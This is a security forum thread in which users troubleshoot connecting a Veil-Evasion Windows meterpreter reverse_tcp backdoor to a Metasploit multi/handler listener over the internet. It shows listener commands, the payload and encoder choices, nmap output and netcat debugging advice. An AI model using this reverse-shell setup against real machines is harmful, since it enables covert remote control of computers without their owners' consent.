Caps Posted August 30, 2015 Posted August 30, 2015 Hello , I am new to this forum but I think you guys can help me.I am having trouble with metasploit over the intenet .I have a backdoor with lhost: external ip and lport: 4444My listener is just multi/handler with lhost: local ip and lport: 4444I portforwarded the port 4444 on my router to my local ip . To make my backdoor I use veil. Hop you can help me !!! Quote
cooper Posted August 30, 2015 Posted August 30, 2015 Well, all I can tell you is that based on your screenshot is that with this configuration in place if something on the internet wants to connect to you on port 4444 that will now work. If you have a backdoor on a remote machine, you probably only need to connect to it as it's listening on a port for you - this whole port mapping thing shouldn't even be required. Unless, in the process of breaking into a remote host you run shellcode on the remote host that results in it connecting back to you. That really is all I can tell you. To make it a car analogy, you're asking me if a close-up photograph of a chunk of asphalt is a part of the road between New York and Las Vegas. It could be, but without a bit more info it's impossible to tell. Quote
Caps Posted August 30, 2015 Author Posted August 30, 2015 (edited) Well, all I can tell you is that based on your screenshot is that with this configuration in place if something on the internet wants to connect to you on port 4444 that will now work. If you have a backdoor on a remote machine, you probably only need to connect to it as it's listening on a port for you - this whole port mapping thing shouldn't even be required. Unless, in the process of breaking into a remote host you run shellcode on the remote host that results in it connecting back to you. That really is all I can tell you. To make it a car analogy, you're asking me if a close-up photograph of a chunk of asphalt is a part of the road between New York and Las Vegas. It could be, but without a bit more info it's impossible to tell. Ok I will try to give you as many info as I can . I run kali linux 2 on my laptop ThinkPas Edge , it is not a vm. I am wireless connected to my router bbox 3 . Here are my commands for my terminal listener : root@kali:~# msfconsole [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 5432? [-] WARNING! The following modules could not be loaded! [-] /usr/share/metasploit-framework/modules/exploits/windows/25912.rb: SyntaxError /usr/share/metasploit-framework/modules/exploits/windows/25912.rb:30: syntax error, unexpected tCONSTANT, expecting end-of-input // Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit ^ # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * Validate lots of vulnerabilities to demonstrate exposure with Metasploit Pro -- Learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071403 ] + -- --=[ 1467 exploits - 840 auxiliary - 232 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.44 lhost => 192.168.1.44 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none) LHOST 192.168.1.44 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.44:4444 [*] Starting the payload handler... msf exploit(handler) > I use veil-evasion for my backdoor . The encoder I use : 35) python/shellcode_inject/base64_substitution Shell code is msfvenom, payload is windows/meterpreter/reverse_tcp LHOST: my external ip LPORT: 4444 no extra msfvenom options thats my backdoor. I also did some nmaps: on my local ip : root@kali:~# nmap 192.168.1.44 -p 4444 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:58 BST Nmap scan report for kali (192.168.1.44) Host is up (0.00013s latency). PORT STATE SERVICE 4444/tcp open krb524 Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds on my router gateway: root@kali:~# nmap 192.168.1.1 -p 4444 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:59 BST Nmap scan report for mymodem (192.168.1.1) Host is up (0.0032s latency). PORT STATE SERVICE 4444/tcp closed krb524 MAC Address: 68:15:90:0C:2E:01 (Sagemcom SAS) Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds and on my public ip: root@kali:~# nmap public ip -p 4444 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 13:00 BST Nmap scan report for x.x.x.x.belgacom.be (public ip) Host is up (0.0065s latency). PORT STATE SERVICE 4444/tcp filtered krb524 Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds Here is my ifconfig on wlan: root@kali:~# ifconfig wlan0 wlan0 Link encap:Ethernet HWaddr 74:e5:0b:0b:f6:a4 inet addr:192.168.1.44 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: 2a02:a03f:2c0a:e400:76e5:bff:fe0b:f6a4/64 Scope:Global inet6 addr: fe80::76e5:bff:fe0b:f6a4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:617656 errors:0 dropped:0 overruns:0 frame:0 TX packets:283680 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:546610500 (521.2 MiB) TX bytes:43580129 (41.5 MiB) I think I gave you all I can, It says that I can't post until tomorow. Edited August 30, 2015 by digininja Removed potential public IP Quote
cooper Posted August 30, 2015 Posted August 30, 2015 I think the problem is with your lhost which you're setting to your LAN IP. When the remote server wants to connect to you it will use that IP as a destination, which of course will make very little sense. You should specify your external IP (i.e. the outside IP of your router) and chances are things will work much better. Quote
digininja Posted August 30, 2015 Posted August 30, 2015 I'd say your port forwarding is broken somewhere. Kill the metasploit stuff and start a basic listner on your macine with netcat then see if you can connect to it from outside, if you can't then the port forward is broken. Quote
digininja Posted August 30, 2015 Posted August 30, 2015 Please Help me , I am still here . If you want instant replies a forum isn't the best way to go, you might get it or it may take days for someone to reply. IRC is usually better if you can find a channel with someone skilled on it. Quote
Caps Posted August 31, 2015 Author Posted August 31, 2015 So I think I got the port forward to work but I can't get a session , even when I try just a local backdoor with the lhost on the backdoor set to my local ip it will not work . Quote
digininja Posted August 31, 2015 Posted August 31, 2015 Have you checked all the stuff with netcat? Quote
i8igmac Posted August 31, 2015 Posted August 31, 2015 http://www.t1shopper.com/tools/port-scan/ if your exploit handler is running on port 4444, you should then scan this port with a remote host, the tool above will tell u if the port is responding... Quote
digip Posted August 31, 2015 Posted August 31, 2015 So I think I got the port forward to work but I can't get a session , even when I try just a local backdoor with the lhost on the backdoor set to my local ip it will not work . And are there any sessions to be interacted with? Did the exploit run successfully? What do you see with: "sessions -l" (-L lowercase) Quote
cooper Posted August 31, 2015 Posted August 31, 2015 Yeah, basically the idea is that you test your exploit locally first so that once you try it over the internet the only thing that can go wrong is the connection. You'll know before-hand what you need to debug in case of problems. Quote
Caps Posted September 2, 2015 Author Posted September 2, 2015 There are no sessions when I try to connect and when I do jobs there is a jobs multi/handler I am trying to fix my problem that I can use my backdoor over lan , any ideas? Quote
digininja Posted September 2, 2015 Posted September 2, 2015 I'm going to ask this once more then leave, have you checked every step using netcat? Make sure that at each stage you can talk between the two machines. Start with nc doing both server and client then move to metasploit as the server and test again. That will show connectivity as the results from your first posts suggest that it is that that is causing at least part of the problem. Quote
Caps Posted September 2, 2015 Author Posted September 2, 2015 (edited) So I did some nc I my listener is woking when I do a nc on my pc on my listener I get sending stage , how do I test it from my windows pc ? I think that my pc blocks connections from outside. EDIT: I installed netcat on my windows when I try to do it I don't get any connections. Edited September 2, 2015 by Caps Quote
digininja Posted September 2, 2015 Posted September 2, 2015 when nc is running as a client it will be connecting out so doesn't matter about inbound connections. Start at the localhost and connect to 4444 then do it from something else on the network, if they work then try it from something outside the network. If any fail you know where the blockage is. Quote
Caps Posted September 2, 2015 Author Posted September 2, 2015 Thanks for the help it works now! Quote
digininja Posted September 2, 2015 Posted September 2, 2015 Always start with the basics and check connectivity before moving up the stack. Glad its working Quote
Caps Posted September 3, 2015 Author Posted September 3, 2015 Nice now its working over lan, I want to try it over internet still the same problem. For the configs of my backdoor and listener see above it is still the same but I will recap it : Backdoor lhost : my external ip lport : 4444 Listener lhost : my internal ip lport : 4444 The port is open on my router , checked with an online checker . Quote
i8igmac Posted September 3, 2015 Posted September 3, 2015 Lhost on your exploit handler should be set to your local ip... your router should port forward this same port and local ip When the exploit handler is running you should now see with a online scanner.. this is a TCP reverse shell? Quote
digininja Posted September 3, 2015 Posted September 3, 2015 The port may be open on the router but is it correctly passing traffic to your listener? Back to basics, use netcat outside to connect to the listener and see if you get the connection. Quote
Caps Posted September 4, 2015 Author Posted September 4, 2015 Yes I use reverse tcp, and it works when I use an online scanner so I have to check on my backdoor . Quote
digininja Posted September 4, 2015 Posted September 4, 2015 What are you using this backdoor for? Assuming it is legitimate reasons then you will have access to the target machine, try netcat from there. That will help prove whether it is the network or exploit that is at fault. Quote
hakkka Posted May 17, 2016 Posted May 17, 2016 Hey guys .... Someone please help me, iam having a crisis and very desperate.. iam having exactly the same problem as Caps had and i tried to fix but failed .... my metasploit listener used to work previously and i got sessions but since i tried to attack my other system over the WAN NETWORK Quote
hakkka Posted May 17, 2016 Posted May 17, 2016 Hey guys .... Someone please help me, iam having a crisis and im very desperate.. iam having exactly the same problem as Caps had and i tried to fix but failed .... my metasploit listener used to work previously and i got sessions but since i tried to attack my other system over the WAN NETWORK ,Now i cant get a session on both LAN and WAN .. Iam on kali 2.0 sana ,for WAN , i used No-ip Dns for static pubilc ip . 1. Created my backdoor my payload is [ windows/meterpreter/reverse_tcp_dns ] LHOST is my [ hostname.ddns.net ] LPORT IS [ 4444 ] and i did port forwarding and also confirmed that the port is working on canyouseeme.org 2. Created a listener i used the same payload [ windows/meterpreter/reverse_tcp_dns ] LHOST is my local ip address and used the same port 4444 . Caps IF YOU can read this please tell me how you did you resolve the problem.... Anyone,please provide me a SOLUTION.... Ill be glad, thx 0 Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.